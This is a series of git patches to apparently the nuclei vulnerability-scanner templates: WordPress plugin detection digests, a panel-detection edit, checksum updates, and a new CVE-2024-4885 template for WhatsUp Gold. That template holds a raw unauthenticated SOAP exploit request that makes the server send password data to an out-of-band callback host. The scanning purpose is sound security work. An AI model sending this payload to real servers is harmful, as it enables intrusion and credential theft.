b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c8e37dc85011e228c30f2724d1a924bed7f6d3127acbd57a8f1d3eaec70e2a1d022100b621ad6b9ea0788d12108abedfeb90038c1dc9a80f58c76abb2249b8ce2ffee0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..3ab5130976 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070b248f62913767ed7cb6a498df930d8b8463d1fa4550f7c02680bf41c4dcb90022067cbb3ce6034143bdbbad6895192662a951483b35d78a929a019a94c60d4cab6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..34d3d4012c 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100804f43211506eca2fefeec1bb91c02881cd90188b6b2f0ba95322df2f8ba0657022100b42a6e6d3b0a1efb62a0a294806525a146a52eb9dbada36c2a92f662acfc7128:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..aee4742c93 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a8ae0d8323d19f7cc8fa8e4fa4358f013687faf374a245003b5a9efb4c2ebf15022100da713fdc6e46b104adb361dbc98f0c91eb657d7d63a7ae68565425ad50d594f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..e0888cab6d 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202aa1afe30335597c01f7120b74978fde16271bf83e83fec54d1c8443b4866f4b022100c74ee5d8b0aec5219308cabe8df1033c93c0725172475c07be95f9ef0fc2a08e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..be1ab27493 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d2b2165c8cdb42cc8aa136b48bad12427c04cf774aaf35d344ab73de8a5a3206022100f886f573dc71b5fec3e843c31acef53e4718aad9b4253d34c659c592dfe8dae7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..2d7343fd72 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220387de0d3f1ad8b80a64fe54b57d38d82269f592568f2085750166b3b3ae733fb02205a6058388bd9d00be7adb3df1d511ea79b4d4dd94c6df2e7ba6d8ceb9c9a8dfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..74ced41fe5 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220029a7dc886a2d242ac122b328a4c324db09c68fb3f4f8439322ce8ab01bcaebb022100d470f42552339724e0c27eaa9a08efc9ca60a5fb52f31ec64f086c5e465c38f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..4f8d7a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c14a7fbbc7448216fdc462aba4d8728d09821473ea8e4f621999a3d944cc4f3e022100b673c2949b1097fb8a41ba3d3c3e5517effdfba1e828fb27fd2bd6a12c64c5ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..259238caf4 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022029006fcb84c4028bb984af1ea352ef361a2aa44aeabb65b22ec14958130f066b022100b07261ee971eda6a1d50aedbc1d6699f9eab3f90d1ad3e009985c84d9a06b450:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..eb93039ba8 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210087c98a2bd947b8831375272d0ec72ccea9f52dc9fc9d5d965b8c30e9b26dbf150221008714b417cda861923b9af2af020d01507334e59e7ed84fc6be46dccc2f9471da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..5e18601bda 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022016bd46aa521718af97762ec502986c3883ee15249ef2763cd06cd322f688c14e022100bfb24b6f8494f3181d14303b9e9193c074ba6a67294cf112031e22de6ae2b0c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..53ebbf25ff 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202d84743f6682e80baaf81460cef73655c511e83e24b683eded24e5784dae3b2402210084abc85a0c71cb8901c32ec2bd2111b7040466eee8df7189a3e53597e7475bb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..a78a3d2d62 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cb23fee7537efa51c063e2e2fa8bf673bb2d028b17a3b56b6291a0db9cbf85d2022007918404d31cc313c68ce2ad5b8ceb42c59bf49f41741db2c12d719682223129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..f91aa3fd19 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d22363a61c810133850b37d6a07158ed860fc19c46b38790a2d55ec1d6e9d2800220477cb63afc8141bdc49f05b11f4b10881999da6b730ead884a28651702e0391b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..4cf724bb2a 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f584875adaa90c4f626cd10fbb365787c33cf25789af6ba2f8d3b79f149c746502203431c10eb81a033d3bae2c8516d314b300224afa91841034aea937edb9318a3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..8bf4cd5ef0 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dba8d7d5401a1dcc01428d3253409561c4042c9be0800543335303b19153df7a022100e526a12674a6254bfafb4b0758702afe69166528d2cccf65e48b182478d1ad3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..22d76f4f1e 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220463051a801241ef38cb6df13c096d3f1601ff1ee7c284f1c7497c92b43475bed02207893c3905fddcbf98b60a0b60c54ff7540f5faa0fa93a380f8fad8fcd58ca745:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..83194d2ed9 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e93550ca085b48e0c7f86097fa880371dfaccf185182cf9584ab625c0d7d590d022100c8721cba4d892376781af0bda91bdc1481a1d4528f3bc7160d917be8af4e031b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..bebe0d3bb7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022014def1a1dbe60b207185fcceb40b12adae41df49414a7588d53759db7c65f38f022040433f6086ae52cce28c05eff785f34b684aadc10da8cbdc0ccd5aef095b5f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..6feefdbb8b 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d0ca36cd1a3e7c839daefc89e2f7719b09b5ff53b989bd279f382a4060c00a5022100dcf4e6bd2322fd7bcc92c6c9a5e592e6e6123422f6dcbcf6620007517a014359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..e95e716ec9 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b0ac62a80d98aec12dc44ef273acd4365684c0752a23f049cc200409ddcbb49a0221008ece8a9e5b9d527724977bc2fc8e14e91debceb339398ec4c7c49472e1d80b3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..7321abbfc2 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022027fc033c62acd2f8e150ce06984519dc5e2338f3f770f4649c608ce13cafc559022100bc9da6793d0f4c730d18dbebe947a008a983b33d5e2445f6cb016892a5013620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..62c53389a6 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203ea89c85316fe6d4c73260cb398ec2a998e24a6919ae67740ff74e51a3e7aa00022100fcaeb222cff624ac92e1c9f50436df30f6db6773b1144c70d60f1173b72a3298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..f609078cdc 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f6a947b09ff502308ab7abd8d8acede529a5d5e6ac3cb0ed798a64d75f89f7a502205463a65e9745559f9366a4541dd1eb84c4f04042a894b5b560924fda2501c5ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..79537bdf7d 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220195fafe9110f58816bf359a1174513de6e822250648526ac465afa5c8932fab002206465fe56ff63378815abacccad53f12d45ed15c847aa2e9a05e566039fb8f66d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..38ad5adfa8 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c3d2fb69cb58332b88435efb1f278778c7a8b941f40ed50b244c84ec7932b6a2022100adf9f027a5bba0359edf4def0f9773b537982176eb08daaaec8e1d9b66c83faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..c5cb3541a3 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100923e0895fe1756e883ea5abd3bcd447b9b5f41e2a954391aa1a0d57a47f57a9902204a008203e92a44a9afd505d091b434716a9cabf6397b083c64156721d98c651e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..6f9cef6f61 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220599eb80a8e8b4f50babfec560324e3ef026644cf35beaed13e098fa2d0b1ae9f02202a46209c10dc2d2ca1df7151b2077e53391ff1c5768fbecd6a5e0c53c057f41d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..66084c8e71 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039d58dfbfe81cd786efa9f57c12d8e632e11ec624ced0511c700f1967d2a581c02201af6b5c6b353ecd310d1406b90130ec545fdaf5aa5d8557bc7576419ca91d83f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/enumeration/beanstalk-service.yaml b/network/enumeration/beanstalk-service.yaml index b4bf3eeb68..2e42517b53 100644 --- a/network/enumeration/beanstalk-service.yaml +++ b/network/enumeration/beanstalk-service.yaml @@ -35,3 +35,4 @@ tcp: name: stats regex: - '([a-z-A-Z: 0-9]+)' +# digest: 4a0a00473045022100905d5e394de22fac18b6c7427b595b4e5d3d0d488254778c2a52b40b4b555ff902207b36ce3bb7ec290b8ba40a3ca39d4742e3620bd4d81013dfebe89ed060617b04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0194fc13d5744814bc2f14d7dd01d492c3e1758a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 22 Jul 2024 13:06:17 +0530 Subject: [PATCH 1490/1841] Create CVE-2024-4885.yaml --- http/cves/2024/CVE-2024-4885.yaml | 49 +++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4885.yaml diff --git a/http/cves/2024/CVE-2024-4885.yaml b/http/cves/2024/CVE-2024-4885.yaml new file mode 100644 index 0000000000..03a6173109 --- /dev/null +++ b/http/cves/2024/CVE-2024-4885.yaml @@ -0,0 +1,49 @@ +id: CVE-2024-4885 + +info: + name: Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution + author: SinSinology,iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + This vulnerability allows remote attackers to execute arbitrary code on affected installations of Progress Software WhatsUp Gold. Authentication is not required to exploit this vulnerability. + The specific flaw exists within the implementation of GetFileWithoutZip method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account. + reference: + - https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-June-2024 + - https://www.zerodayinitiative.com/advisories/ZDI-24-893/ + - https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/ + - https://www.progress.com/network-monitoring + - https://github.com/sinsinology/CVE-2024-4885 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-4885 + cwe-id: CWE-22 + epss-score: 0.00066 + epss-percentile: 0.29461 + metadata: + verified: true + max-request: 1 + shodan-query: html:"WhatsUp Gold" + tags: cve,cve2024,rce,progress,whatsup,lfi + +http: + - raw: + - | + POST /NmAPI/RecurringReport HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml; charset=utf-8 + SOAPAction: http://tempuri.org/IRecurringReportServices/TestRecurringReport + + falseNoneC:\PROGRA~2\Ipswitch\WhatsUp\Data\ScheduledReports25WhatsUpGold@YourDomain.comEmailing: Wireless Log5falseWhatsUp Goldtruefalsetrue00300htmlfalsefalsefalsefalse240PortraitLetterhtmlfalseg:i:s atrueC:\\Program Files (x86)\\Ipswitch\\WhatsUp\\html\\NmConsole\\falsefalse2e441d4d5a4b258b-11Intervaltruetruetruetruetruetruetrue13DayOfMonthFirstSunday11MinutesTimeInterval2024-07-05T16:59:14.047957+01:002024-07-05T16:59:14.047957+01:0013FirstSundayMarchDayOfYearMarch{"title":"foo","renderType":"aspx","reports":[{"title":"thetitle","url":"/NmConsole/api/Wireless/ReportWirelessLog","dateRangeFilter":{"label":"Date Range","n":0,"range":"Today","text":"Today"},"severityFilter":{"label":"Severity","value":-1,"text":"ALL"},"limit":50,"grid":{"emptyText":"[ No records found ]","columns":[{"dataIndex":"Date","text":"Date","flex":1},{"dataIndex":"Severity","text":"Severity","flex":1},{"dataIndex":"Message","text":"Message","flex":1}],"filters":[],"sorters":[]}}],"baseUrl":"http://{{interactsh-url}}","userId":1}1admin + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: interactsh_request + words: + - "sPassword" From eee2c8128dc338c9a133505f28b6d9f411eabe0d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 22 Jul 2024 13:11:05 +0530 Subject: [PATCH 1491/1841] Update hal-management-panel.yaml --- http/exposed-panels/hal-management-panel.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/http/exposed-panels/hal-management-panel.yaml b/http/exposed-panels/hal-management-panel.yaml index 5e5b7bfb45..8b0d152f94 100644 --- a/http/exposed-panels/hal-management-panel.yaml +++ b/http/exposed-panels/hal-management-panel.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDK severity: info description: | - HAL Management Console login panel was discovered + HAL Management Console login panel was discovered. metadata: verified: true max-request: 1 @@ -13,10 +13,9 @@ info: tags: panel,login,hal http: - - raw: - - | - GET /console/index.html HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/console/index.html" matchers-condition: and matchers: @@ -24,3 +23,7 @@ http: part: body words: - "HAL Management Console" + + - type: status + status: + - 200 From a5c21705ef1e9e95e96911a4ec1df14f02e97cf7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 22 Jul 2024 07:42:10 +0000 Subject: [PATCH 1492/1841] Auto Generated New Template Addition List [Mon Jul 22 07:42:09 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 050c5dd84d..49073cac2d 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/exposed-panels/adguard-panel.yaml http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/freshrss-panel.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml +http/exposed-panels/netflow-analyzer-panel.yaml http/exposed-panels/tomcat/tomcat-exposed.yaml http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml From 8fa1af3b16882897bdcc7ba99b1407d8c75fc9ec Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 22 Jul 2024 07:42:28 +0000 Subject: [PATCH 1493/1841] Auto Generated Templates Checksum [Mon Jul 22 07:42:28 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f1672fdb83..b013ad3a03 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4342,6 +4342,7 @@ http/exposed-panels/nessus-panel.yaml:87b3063a5e06c727b4c173666ebbd0c60298054f http/exposed-panels/netdata-dashboard-detected.yaml:88a57f2a4a6d8cbc86e33430540b3dd56cf9a011 http/exposed-panels/netdata-panel.yaml:8fd3ca0fb8484c1e551786fb041a5281c28c81a3 http/exposed-panels/netflix-conductor-ui.yaml:4ecd3cb1f70552519e9cbbc96a78e64e91d16389 +http/exposed-panels/netflow-analyzer-panel.yaml:e8022e7842324d1bfe677ac71af755cb69ee4251 http/exposed-panels/netgear-version-detect.yaml:1f15ea1787f6da7ace19e6d13e2ea8d313389c3c http/exposed-panels/netis-router.yaml:37a842ce9b050b0adf42caa1683e033cf9f3cf27 http/exposed-panels/netlify-cms.yaml:52f77df2c632a0b49af6f01e67f69347308dc73a @@ -7306,229 +7307,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:c5adda802b407d70341e71e61d5cd6c8899f4a91 +http/technologies/wordpress/plugins/add-to-any.yaml:77f9cfef56d9531c2787a8b631472ec833e22b76 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:946cd00a1faafe206adaa44a29f2d6afa71c1609 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:1fa8ef8cc10746d80586ad02d8fe81007140be3e +http/technologies/wordpress/plugins/akismet.yaml:f0406756c5e1b08de5f134e9eb34a07d7a6092b2 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:7a29a04a2f233eef2daebd14d88e0070072ba00a +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:d65e6400ad64470147de281ba457cf8bc899d99b +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f8a54c5014dabe34bd9d4f37bfa72b4b81bcd4b9 +http/technologies/wordpress/plugins/amp.yaml:9b372638128c0e2f70a40f0735c227fc361809c4 +http/technologies/wordpress/plugins/antispam-bee.yaml:2a90ecdb459d4275f0a878d7e86f7133adddad43 +http/technologies/wordpress/plugins/astra-sites.yaml:0bba9bbd8164f43aee997302ba193961c76bdea0 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 